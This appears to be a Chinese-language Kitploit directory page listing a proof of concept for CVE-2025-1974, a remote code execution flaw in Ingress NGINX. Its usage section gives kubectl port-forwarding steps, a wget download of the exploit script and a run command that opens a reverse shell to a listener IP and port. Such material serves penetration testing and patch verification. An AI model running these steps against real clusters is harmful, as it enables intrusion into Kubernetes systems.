Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1974-poc — CVE-2025-1974 的 PoC,修改自全球首个 PoC~ | Kitploit
工具/GitHubGitHub/hi-unc1e/cve-2025-1974-poc
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试云安全
GitHubhi-unc1e/cve-2025-1974-poc

CVE-2025-1974-poc

CVE-2025-1974 的 PoC,修改自全球首个 PoC~

查看仓库
4111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

POC of IngressNightmare, RCE in Ingress NGINX (CVE-2025-1974)

Developed from:

  • https://github.com/zwxxb/CVE-2025-1974/blob/main/poc.py
  • https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities#how-did-we-discover-ingressnightmare-24

Thanks

使用说明

root@kitploit:~
# forward the admission webhook
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80 &
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 9443:443 &


# python3 -m pip install -r requirements.txt
python3 -m pip install httpx asyncio
wget -c https://github.com/hi-unc1e/CVE-2025-1974-poc/raw/refs/heads/master/poc.py
python3 poc.py --local --ip 192.168.49.1 --port 4444  --admission-port 9443

参数说明:

  • ip、port,反弹 shell 用
  • admission-port,默认是 8443

执行效果:

image

下载工具